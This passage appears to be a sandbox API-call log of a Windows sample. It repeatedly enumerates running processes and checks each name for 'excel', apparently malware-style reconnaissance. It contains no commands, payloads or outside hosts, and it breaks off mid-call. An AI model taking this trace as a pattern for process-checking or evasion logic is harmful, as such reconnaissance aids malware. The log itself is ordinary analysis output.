lpUsedDefaultChar=0x0) returned 12 [0096.364] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0096.364] StrStrIA (lpFirst="svchost.exe", lpSrch="excel") returned 0x0 [0096.364] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x434, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.365] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.365] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3577408 [0096.365] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3577408, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0096.365] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0096.365] StrStrIA (lpFirst="svchost.exe", lpSrch="excel") returned 0x0 [0096.365] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x554, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.366] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.366] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3577360 [0096.366] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3577360, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0096.366] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0096.366] StrStrIA (lpFirst="svchost.exe", lpSrch="excel") returned 0x0 [0096.366] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.367] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.367] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3577378 [0096.367] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3577378, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0096.367] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0096.367] StrStrIA (lpFirst="svchost.exe", lpSrch="excel") returned 0x0 [0096.367] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.368] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.368] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3577390 [0096.368] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3577390, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0096.368] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0096.368] StrStrIA (lpFirst="svchost.exe", lpSrch="excel") returned 0x0 [0096.368] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.369] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.369] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35773a8 [0096.369] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35773a8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0096.369] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0096.369] StrStrIA (lpFirst="svchost.exe", lpSrch="excel") returned 0x0 [0096.369] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0096.370] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spoolsv.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.370] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3577420 [0096.370] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spoolsv.exe", cchWideChar=-1, lpMultiByteStr=0x3577420, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 12 [0096.370] lstrcpyA (in: lpString1=0x567fabc, lpString2="spoolsv.exe" | out: lpString1="spoolsv.exe") returned="spoolsv.exe" [0096.370] StrStrIA (lpFirst="spoolsv.exe", lpSrch="excel") returned 0x0 [0096.371] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x69c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.372] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.372] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3577438 [0096.372] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3577438, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0096.372] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0096.372] StrStrIA (lpFirst="svchost.exe", lpSrch="excel") returned 0x0 [0096.372] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x554, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0096.373] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="audiodg.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.373] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3577570 [0096.373] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="audiodg.exe", cchWideChar=-1, lpMultiByteStr=0x3577570, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 12 [0096.373] lstrcpyA (in: lpString1=0x567fabc, lpString2="audiodg.exe" | out: lpString1="audiodg.exe") returned="audiodg.exe" [0096.373] StrStrIA (lpFirst="audiodg.exe", lpSrch="excel") returned 0x0 [0096.373] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x708, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0096.374] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sihost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0096.374] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3577498 [0096.374] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sihost.exe", cchWideChar=-1, lpMultiByteStr=0x3577498, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 11 [0096.374] lstrcpyA (in: lpString1=0x567fabc, lpString2="sihost.exe" | out: lpString1="sihost.exe") returned="sihost.exe" [0096.374] StrStrIA (lpFirst="sihost.exe", lpSrch="excel") returned 0x0 [0096.374] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x720, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.375] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.375] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35773d8 [0096.375] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35773d8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0096.375] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0096.375] StrStrIA (lpFirst="svchost.exe", lpSrch="excel") returned 0x0 [0096.375] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0096.385] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0096.385] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3577450 [0096.385] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x3577450, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0096.386] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0096.386] StrStrIA (lpFirst="taskhostw.exe", lpSrch="excel") returned 0x0 [0096.386] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x560, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3d, th32ParentProcessID=0x568, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0096.387] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="explorer.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0096.387] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3577510 [0096.387] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="explorer.exe", cchWideChar=-1, lpMultiByteStr=0x3577510, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 13 [0096.387] lstrcpyA (in: lpString1=0x567fabc, lpString2="explorer.exe" | out: lpString1="explorer.exe") returned="explorer.exe" [0096.387] StrStrIA (lpFirst="explorer.exe", lpSrch="excel") returned 0x0 [0096.387] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x818, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0096.388] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0096.388] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x35751e0 [0096.388] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=-1, lpMultiByteStr=0x35751e0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 21 [0096.388] lstrcpyA (in: lpString1=0x567fabc, lpString2="OfficeClickToRun.exe" | out: lpString1="OfficeClickToRun.exe") returned="OfficeClickToRun.exe" [0096.388] StrStrIA (lpFirst="OfficeClickToRun.exe", lpSrch="excel") returned 0x0 [0096.388] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x84c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0096.389] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SecurityHealthService.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0096.389] LocalAlloc (uFlags=0x40, uBytes=0x1a) returned 0x356b320 [0096.389] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SecurityHealthService.exe", cchWideChar=-1, lpMultiByteStr=0x356b320, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SecurityHealthService.exe", lpUsedDefaultChar=0x0) returned 26 [0096.389] lstrcpyA (in: lpString1=0x567fabc, lpString2="SecurityHealthService.exe" | out: lpString1="SecurityHealthService.exe") returned="SecurityHealthService.exe" [0096.390] StrStrIA (lpFirst="SecurityHealthService.exe", lpSrch="excel") returned 0x0 [0096.390] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0096.391] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="Memory Compression", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0096.391] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x3575400 [0096.391] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="Memory Compression", cchWideChar=-1, lpMultiByteStr=0x3575400, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Memory Compression", lpUsedDefaultChar=0x0) returned 19 [0096.391] lstrcpyA (in: lpString1=0x567fabc, lpString2="Memory Compression" | out: lpString1="Memory Compression") returned="Memory Compression" [0096.391] StrStrIA (lpFirst="Memory Compression", lpSrch="excel") returned 0x0 [0096.391] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb3c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0096.392] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0096.392] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x35753a0 [0096.392] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=-1, lpMultiByteStr=0x35753a0, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 24 [0096.392] lstrcpyA (in: lpString1=0x567fabc, lpString2="ShellExperienceHost.exe" | out: lpString1="ShellExperienceHost.exe") returned="ShellExperienceHost.exe" [0096.392] StrStrIA (lpFirst="ShellExperienceHost.exe", lpSrch="excel") returned 0x0 [0096.392] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0096.393] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SearchUI.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0096.393] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3577588 [0096.393] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SearchUI.exe", cchWideChar=-1, lpMultiByteStr=0x3577588, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 13 [0096.393] lstrcpyA (in: lpString1=0x567fabc, lpString2="SearchUI.exe" | out: lpString1="SearchUI.exe") returned="SearchUI.exe" [0096.393] StrStrIA (lpFirst="SearchUI.exe", lpSrch="excel") returned 0x0 [0096.393] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0096.394] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="RuntimeBroker.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0096.394] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x3575280 [0096.394] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="RuntimeBroker.exe", cchWideChar=-1, lpMultiByteStr=0x3575280, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 18 [0096.394] lstrcpyA (in: lpString1=0x567fabc, lpString2="RuntimeBroker.exe" | out: lpString1="RuntimeBroker.exe") returned="RuntimeBroker.exe" [0096.395] StrStrIA (lpFirst="RuntimeBroker.exe", lpSrch="excel") returned 0x0 [0096.395] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0096.396] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0096.396] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35773c0 [0096.396] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x35773c0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 13 [0096.396] lstrcpyA (in: lpString1=0x567fabc, lpString2="WmiPrvSE.exe" | out: lpString1="WmiPrvSE.exe") returned="WmiPrvSE.exe" [0096.396] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="excel") returned 0x0 [0096.396] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="pending.exe")) returned 1 [0096.397] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pending.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.397] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35774b0 [0096.397] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pending.exe", cchWideChar=-1, lpMultiByteStr=0x35774b0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pending.exe", lpUsedDefaultChar=0x0) returned 12 [0096.397] lstrcpyA (in: lpString1=0x567fabc, lpString2="pending.exe" | out: lpString1="pending.exe") returned="pending.exe" [0096.397] StrStrIA (lpFirst="pending.exe", lpSrch="excel") returned 0x0 [0096.397] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="appointmentimpressed.exe")) returned 1 [0096.398] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="appointmentimpressed.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0096.398] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x356afd8 [0096.398] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="appointmentimpressed.exe", cchWideChar=-1, lpMultiByteStr=0x356afd8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="appointmentimpressed.exe", lpUsedDefaultChar=0x0) returned 25 [0096.398] lstrcpyA (in: lpString1=0x567fabc, lpString2="appointmentimpressed.exe" | out: lpString1="appointmentimpressed.exe") returned="appointmentimpressed.exe" [0096.398] StrStrIA (lpFirst="appointmentimpressed.exe", lpSrch="excel") returned 0x0 [0096.398] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="swing prefer.exe")) returned 1 [0096.399] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="swing prefer.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0096.399] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x35752a0 [0096.399] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="swing prefer.exe", cchWideChar=-1, lpMultiByteStr=0x35752a0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="swing prefer.exe", lpUsedDefaultChar=0x0) returned 17 [0096.399] lstrcpyA (in: lpString1=0x567fabc, lpString2="swing prefer.exe" | out: lpString1="swing prefer.exe") returned="swing prefer.exe" [0096.399] StrStrIA (lpFirst="swing prefer.exe", lpSrch="excel") returned 0x0 [0096.399] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="vietnamese_mature_hat.exe")) returned 1 [0096.400] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="vietnamese_mature_hat.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0096.400] LocalAlloc (uFlags=0x40, uBytes=0x1a) returned 0x356af88 [0096.400] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="vietnamese_mature_hat.exe", cchWideChar=-1, lpMultiByteStr=0x356af88, cbMultiByte=26, 